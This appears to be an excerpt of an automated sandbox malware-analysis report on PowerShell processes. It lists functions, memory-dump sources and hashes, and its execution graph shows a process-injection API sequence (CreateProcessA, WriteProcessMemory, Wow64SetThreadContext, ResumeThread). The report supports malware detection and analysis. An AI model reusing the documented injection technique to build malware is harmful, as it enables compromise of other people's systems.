                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction ID: e0f8365b16397456555a3586aef99a22a5c7f1437f2a0f879beee55bc7f743ae
                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction Fuzzy Hash: 5301677121CB0C4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3661DA36E882CB45
                                  Function 00007FFD345BA1A8 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c96e441bb6a8dc26b74e41295ac5314757895276bac05d89efc8c153a85af19
                                  • Instruction ID: 1f9833450217bfcd35f9185b4d8c9bb726101e4cfefa0e58f49052e638ff1d8a
                                  • Opcode Fuzzy Hash: 8c96e441bb6a8dc26b74e41295ac5314757895276bac05d89efc8c153a85af19
                                  • Instruction Fuzzy Hash: 10014C3581C3854FE346AF3C98650E63F62EF23211F1540A7D598CE173E7299A44C7C2
                                  Function 00007FFD3468414D Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccde5ec29ecc09bc717ce20e50634ba227ecd421743e65ca3f1faa3856ffbdf6
                                  • Instruction ID: 579c2255e0a166dedac05376e45fbea681f1d5977577741ebc116a673820d809
                                  • Opcode Fuzzy Hash: ccde5ec29ecc09bc717ce20e50634ba227ecd421743e65ca3f1faa3856ffbdf6
                                  • Instruction Fuzzy Hash: 14F0BE32B4C5548FD7A8EE4CE4904E873E0EF5632071100BAE19DC7163DA29EC40C780
                                  Function 00007FFD34684400 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4d6f590a1d22996f5df73fb7035958a7a483f5e9515f8e9a7d63b080e8e8ea0
                                  • Instruction ID: b380de01e759278f48f769cecf0d83cc21a97f463672835a1bd78564bdf7be8e
                                  • Opcode Fuzzy Hash: f4d6f590a1d22996f5df73fb7035958a7a483f5e9515f8e9a7d63b080e8e8ea0
                                  • Instruction Fuzzy Hash: BEF05832A4D6548FDBA4EE4CE4919E8B7E0EF46324B5500B6E25DCB463EA2AAC50C750
                                  Function 00007FFD346841D1 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: fdb8ed03b090c9051358b335e04323c352ea65cc8fcb3d86cf8ffce3a64db182
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: CFE04F31B4C8288FDAA8DE0CE0909F973E1EF9933171101B7D28EC7561DA26EC51DB80

                                  Non-executed Functions

                                  Function 00007FFD345B8BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N_^=$N_^@$N_^T$N_^U$N_^W$N_^Y
                                  • API String ID: 0-17849902
                                  • Opcode ID: ca3745852a2e69d2b78a1b3f43b8aaac156c8b37c5fc53744375dbc9b9916023
                                  • Instruction ID: 0a882024b67820146b271ff8dde64959a4d0347595669312996d4c13025ddb3c
                                  • Opcode Fuzzy Hash: ca3745852a2e69d2b78a1b3f43b8aaac156c8b37c5fc53744375dbc9b9916023
                                  • Instruction Fuzzy Hash: DA2101A3B185255BD31237ADBC612E83B85EFA137234502F2E358DF213DD24A48B8682

                                  Executed Functions

                                  Function 00007FFD345A9DD8 Relevance: .2, Instructions: 244COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d932cb3109c7cca9de41216c20fdc05afde7b6a7b99c464d952c0c0e42057db0
                                  • Instruction ID: fbef78ceed462707bb1aba04bc452586e31d82871639533f283d7319169e12c6
                                  • Opcode Fuzzy Hash: d932cb3109c7cca9de41216c20fdc05afde7b6a7b99c464d952c0c0e42057db0
                                  • Instruction Fuzzy Hash: 83119D7190E7C54FEB839B2458651A97FA0AF13200B1901E7D588CB0E3EA2998188792
                                  Function 00007FFD345AA210 Relevance: .2, Instructions: 224COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77dea3ce18f064c0edba118e65d0b51d043be785dcc1c992b1c7e1b20e61b42e
                                  • Instruction ID: 29b8c26b3e201652ad431f5f4c556a46a88e4921bd3ee6a53b13a97f74f8f9fa
                                  • Opcode Fuzzy Hash: 77dea3ce18f064c0edba118e65d0b51d043be785dcc1c992b1c7e1b20e61b42e
                                  • Instruction Fuzzy Hash: BBF0627590E7C84FDB979F2498684987FB0EF67205B0901EBD549CB0B3DA299C58CB82
                                  Function 00007FFD345A9848 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63380469681b03bc124bb108d32067eb6af1aee70dfd852e7687c72403504868
                                  • Instruction ID: c93889cd5722b983465c920cfedd68cda49a2e9883cead08abb0144e803c31d0
                                  • Opcode Fuzzy Hash: 63380469681b03bc124bb108d32067eb6af1aee70dfd852e7687c72403504868
                                  • Instruction Fuzzy Hash: 0141E571A0DE888FEB599B5C98466B97BE0FB99310F00412FE549D3292DB24E855CFC2
                                  Function 00007FFD3448EB80 Relevance: .1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2917877724.00007FFD3448D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3448D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd3448d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2059ce0f19320bab9cbd240e57bfb99c2d0ea9b15c25a827ba8400dd3472135f
                                  • Instruction ID: 1e377a3c05e577a2ded165bd30e08408f735537e613efa69aec07f5541969748
                                  • Opcode Fuzzy Hash: 2059ce0f19320bab9cbd240e57bfb99c2d0ea9b15c25a827ba8400dd3472135f
                                  • Instruction Fuzzy Hash: 0141287190DBC44FE796CB2898959523FF0EF53324B1605EFD089CB1A7D62AA806C793
                                  Function 00007FFD345AA471 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c42cbe860445d6524da5e20ef12c2683f22e77d8372aa32865ab5f7304c1fa4d
                                  • Instruction ID: 785d9acfedc0e577abb25aee498826e0e30f49c01e6f9a3e108202f48184b43e
                                  • Opcode Fuzzy Hash: c42cbe860445d6524da5e20ef12c2683f22e77d8372aa32865ab5f7304c1fa4d
                                  • Instruction Fuzzy Hash: A731D47190D7884FDB5ADF68885A6E93FF0EF96321F0441ABD148C71A3D639A809CB51
                                  Function 00007FFD3467681E Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 526b9c7638b18bc81bafd74b3be9c352135148a4ae0f471f54cb241fa03e8ed8
                                  • Instruction ID: c721b1ae378f046a5264ac571e4f500148ab571721625236d966a9ed50271001
                                  • Opcode Fuzzy Hash: 526b9c7638b18bc81bafd74b3be9c352135148a4ae0f471f54cb241fa03e8ed8
                                  • Instruction Fuzzy Hash: 6E110232B0D6894FEB51EEA884A45A87BD1EF4A320B0481BEC54DDB193DA2CA845C360
                                  Function 00007FFD345A33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                  • Instruction ID: b7be8378397c277a12bbf95699010c8dedcbfcd85235336e64c80b42ffd499b7
                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                  • Instruction Fuzzy Hash: A301677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056EE58AC36A1DA36E882CB45
                                  Function 00007FFD3467414D Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5f8e2c0de9855ee15856fe66ec819d1f27cf3d58c521f595e76de15d0830bfa
                                  • Instruction ID: e395c52eb549613baf8110d8c1dca2278c07ebfc4c987b48326da432ed0cb58a
                                  • Opcode Fuzzy Hash: e5f8e2c0de9855ee15856fe66ec819d1f27cf3d58c521f595e76de15d0830bfa
                                  • Instruction Fuzzy Hash: 09F09A32B4C5548FD7A8EE4CE8944E877E4EF5632071100BAE19DC7563CA29EC40C780
                                  Function 00007FFD34674400 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00f271c2d7a4964e2e9b7e6be719aa1cb7af6671262a60468ba168603a495af2
                                  • Instruction ID: 2138dc0e1db139b6c8fa98b256547981e87360ef6df5988de902ddb7fc1f7a42
                                  • Opcode Fuzzy Hash: 00f271c2d7a4964e2e9b7e6be719aa1cb7af6671262a60468ba168603a495af2
                                  • Instruction Fuzzy Hash: 2EF0BE32A8C6448FD794EE5CE8944E87BE0EF06324B1100B6E18DC7067CA29AC40D740
                                  Function 00007FFD346741D1 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: e1d637861dc44f016fd111c09d8ac5b5712ce95191d6a14aabc9289cbec3c765
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: 0BE09A31B0C8288FDA68EE0CE4948F873E1EB9937071141B7D28EC3521CA26EC418B80

                                  Non-executed Functions

                                  Function 00007FFD345A8BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^=$O_^@$O_^T$O_^U$O_^W$O_^Y
                                  • API String ID: 0-102297637
                                  • Opcode ID: d22c54aaf6e82a722451d72018c1a723a08b894847c0f1906f4d3ca71e110467
                                  • Instruction ID: 113bfc867cb5dbc96d7666598e98d6b35257ac316d762ffd2f4d677c6e676211
                                  • Opcode Fuzzy Hash: d22c54aaf6e82a722451d72018c1a723a08b894847c0f1906f4d3ca71e110467
                                  • Instruction Fuzzy Hash: CF2165B77185259FD20237AEB8512D93B85DFE167334505F2E25EDF313DD14A88B8980
                                  Function 00007FFD345A84DD Relevance: 7.6, Strings: 6, Instructions: 84COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^$O_^$O_^$O_^$O_^$O_^
                                  • API String ID: 0-3255002459
                                  • Opcode ID: 44769097700238e4e816388abf2485605a5f16f3b53e59835e9a3bfd12cde191
                                  • Instruction ID: 0430ceb0a18ac6c8d57934cc5f82149f972ad5c782af780acb173fa4365ec519
                                  • Opcode Fuzzy Hash: 44769097700238e4e816388abf2485605a5f16f3b53e59835e9a3bfd12cde191
                                  • Instruction Fuzzy Hash: 93317FA6F0E6C22FE387473D48B91A92FA1AF53224B0E04F6C5D8CF1A3E91C59179351
                                  Function 00007FFD345A865D Relevance: 6.3, Strings: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^$O_^$O_^$O_^$O_^
                                  • API String ID: 0-2660881393
                                  • Opcode ID: 409d69fa2316310cc1cd035c5c4ab2d503e367240521bc5125cdb307294a088b
                                  • Instruction ID: ce657b3deb59952fe4c20a430bfdf2a4bb9d9636ae893e2b39330ac89348da0a
                                  • Opcode Fuzzy Hash: 409d69fa2316310cc1cd035c5c4ab2d503e367240521bc5125cdb307294a088b
                                  • Instruction Fuzzy Hash: 671196A6D0D6D60BF75313398C751963F819F23228F0E19F5C9DD8F293E61C6515C282

                                  Executed Functions

                                  Function 00007FFD345D33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2369265534.00007FFD345D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd345d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: 0adcd0b9446b3c0ba168271ab482ef53baa67b4974ccfce10539ead2319cfe1f
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: B701677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                  Execution Graph

                                  Execution Coverage:6.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:13
                                  Total number of Limit Nodes:0
                                  execution_graph 2632 7ffd345b6038 2633 7ffd345b6041 Wow64SetThreadContext 2632->2633 2635 7ffd345b6104 2633->2635 2636 7ffd345b5f3d 2637 7ffd345b5f4b ResumeThread 2636->2637 2639 7ffd345b6006 2637->2639 2640 7ffd345b65a4 2641 7ffd345b65ad 2640->2641 2641->2641 2642 7ffd345b6cc3 CreateProcessA 2641->2642 2643 7ffd345b6d48 2642->2643 2644 7ffd345b6244 2645 7ffd345b624d WriteProcessMemory 2644->2645 2647 7ffd345b6346 2645->2647

                                  Executed Functions

                                  Function 00007FFD34681493 Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_H
                                  • API String ID: 0-3997733227
                                  • Opcode ID: a72f8e0957642fe087345213db6807d94dc5a95e007c230ab0da8aa932024dbf
                                  • Instruction ID: 45f78825479aa407f3ea26a6218a28bc89763f0eb6bf560070acd1a729c3ae2f
                                  • Opcode Fuzzy Hash: a72f8e0957642fe087345213db6807d94dc5a95e007c230ab0da8aa932024dbf
                                  • Instruction Fuzzy Hash: 1AE12862B0DBD94FE7A69B2858A51F47BE1EF57314B0801FFD18AC7193D9189C069342
                                  Function 00007FFD345B65A4 Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 967processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID: N_H
                                  • API String ID: 963392458-343878021
                                  • Opcode ID: dd9ca6a14c5922fd70c56991b1aa619d9c75efbbd89dfac95b2e34b068b574e9
                                  • Instruction ID: 3ea188be1ebe39e28d3dc0d7e075a88a47f3764ce4de9178a8cc11a9e00268e4
                                  • Opcode Fuzzy Hash: dd9ca6a14c5922fd70c56991b1aa619d9c75efbbd89dfac95b2e34b068b574e9
                                  • Instruction Fuzzy Hash: B6F1B631A18A8D4FDF66DF28CC567E977E0FF5A310F04416AD84DC7292DE78A9418B82
                                  Function 00007FFD345B6244 Relevance: 1.7, APIs: 1, Instructions: 151injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 227 7ffd345b6244-7ffd345b624b 228 7ffd345b6256-7ffd345b6269 227->228 229 7ffd345b624d-7ffd345b6255 227->229 230 7ffd345b626b-7ffd345b62d1 228->230 231 7ffd345b62d2-7ffd345b62e5 228->231 229->228 230->231 235 7ffd345b62e7-7ffd345b62ec 231->235 236 7ffd345b62ef-7ffd345b6344 WriteProcessMemory 231->236 235->236 238 7ffd345b6346 236->238 239 7ffd345b634c-7ffd345b637d 236->239 238->239
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 37035bcbaa36d034df34cf499a12dce607e10b1e83701573af3c497c255a0fc0
                                  • Instruction ID: 656d41cf6771b876365c111e5b14fcf70b4d5c42fe24a854c3dda525cd62dbf5
                                  • Opcode Fuzzy Hash: 37035bcbaa36d034df34cf499a12dce607e10b1e83701573af3c497c255a0fc0
                                  • Instruction Fuzzy Hash: 7241E831D0CB484FEB289B9898566FDBBE1EB95311F00426FE449D3252DE74A8458782
                                  Function 00007FFD345B6038 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 241 7ffd345b6038-7ffd345b603f 242 7ffd345b604a-7ffd345b6059 241->242 243 7ffd345b6041-7ffd345b6049 241->243 244 7ffd345b605b-7ffd345b60bd 242->244 245 7ffd345b60c2-7ffd345b60c4 242->245 243->242 247 7ffd345b60c7-7ffd345b6102 Wow64SetThreadContext 244->247 254 7ffd345b60bf-7ffd345b60c0 244->254 245->247 250 7ffd345b610a-7ffd345b6139 247->250 251 7ffd345b6104 247->251 251->250 254->245
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 8f55da78104f4654542939888a85bec6fc4c2040cad0682bda0d5b6e2b45a563
                                  • Instruction ID: c0581043851def6ac3a6f0a719afc559946ac5794f2f752fd0e2e9e94e54d832
                                  • Opcode Fuzzy Hash: 8f55da78104f4654542939888a85bec6fc4c2040cad0682bda0d5b6e2b45a563
                                  • Instruction Fuzzy Hash: 3E311831D0CB484FDB29AFA898556F9BBE5EB56321F04023FD04AD3192DF78A4068781
                                  Function 00007FFD345B5F3D Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 7ffd345b5f3d-7ffd345b5f49 256 7ffd345b5f4b-7ffd345b5f53 255->256 257 7ffd345b5f54-7ffd345b5f63 255->257 256->257 258 7ffd345b5f65-7ffd345b5f6d 257->258 259 7ffd345b5f6e-7ffd345b6004 ResumeThread 257->259 258->259 264 7ffd345b6006 259->264 265 7ffd345b600c-7ffd345b6031 259->265 264->265
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 524d28f195ba855a569ec4ec20e628d9bb81f202c8d06938ec06ad0915b28294
                                  • Instruction ID: de5035e5112d5e7a0282f72c7c9c36decc7cee833ed5cacf86a6eb36873d4575
                                  • Opcode Fuzzy Hash: 524d28f195ba855a569ec4ec20e628d9bb81f202c8d06938ec06ad0915b28294
                                  • Instruction Fuzzy Hash: 7B31083190D7884FDB5ADFB888966E9BFE0EF57320F0442ABD049C7193DA785415C751
                                  Function 00007FFD34680564 Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ceeaaf68e0eae1e5161bb88ff9c55995449559a73da608ba0617b3692d42ece
                                  • Instruction ID: f321c23a345cdc2163073f1c47101f30caedcd41545441f70e9ec543a450235c
                                  • Opcode Fuzzy Hash: 9ceeaaf68e0eae1e5161bb88ff9c55995449559a73da608ba0617b3692d42ece
                                  • Instruction Fuzzy Hash: 33412422B1DF6A0BE7E98E5C14A12F5B7C2EF96620F4906BBC54DD3182ED08EC415281
                                  Function 00007FFD34680ADE Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 305 7ffd34680ade-7ffd34680af4 306 7ffd34680b0d-7ffd34680b12 305->306 307 7ffd34680af6-7ffd34680b03 305->307 309 7ffd34680baa-7ffd34680bb4 306->309 310 7ffd34680b18-7ffd34680b1b 306->310 307->306 313 7ffd34680b05-7ffd34680b0b 307->313 311 7ffd34680bc3-7ffd34680c06 309->311 312 7ffd34680bb6-7ffd34680bc2 309->312 310->309 314 7ffd34680b21-7ffd34680b24 310->314 313->306 316 7ffd34680b4b 314->316 317 7ffd34680b26-7ffd34680b49 314->317 318 7ffd34680b4d-7ffd34680b4f 316->318 317->318 318->309 321 7ffd34680b51-7ffd34680b5b 318->321 321->309 326 7ffd34680b5d-7ffd34680b73 321->326 328 7ffd34680b7a-7ffd34680b83 326->328 329 7ffd34680b9c-7ffd34680ba9 328->329 330 7ffd34680b85-7ffd34680b92 328->330 330->329 332 7ffd34680b94-7ffd34680b9a 330->332 332->329
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38b231d90df99d9a32d13bdbccf65e156ec0886d82aa2412f0f5cc8c5ee45312
                                  • Instruction ID: 46cc4baaff9d32e995dfdebc84150411874c3cf4abfbaae143c731a73ffdf76b
                                  • Opcode Fuzzy Hash: 38b231d90df99d9a32d13bdbccf65e156ec0886d82aa2412f0f5cc8c5ee45312
                                  • Instruction Fuzzy Hash: 52413522B0EF6A0FEBF89A6C18B16F973C2EF95714B59057AD54DC3196ED0DAC019380
                                  Function 00007FFD346805B9 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac71ffa50ea0dc750807b6d20ef818cc0a08392dc1a010a93eea52dba7a2d6a0
                                  • Instruction ID: 24dd7a881a790956024661312e3b49d86da2687ae0657dd2148220cece33145a
                                  • Opcode Fuzzy Hash: ac71ffa50ea0dc750807b6d20ef818cc0a08392dc1a010a93eea52dba7a2d6a0
                                  • Instruction Fuzzy Hash: 0911D813F1EF6A0BF3F95E5C18B51F866C2DF96A21F4A06BAD64DE21C2DC0CAC512191

                                  Execution Graph

                                  Execution Coverage:6.6%
                                  Dynamic/Decrypted Code Coverage:0%
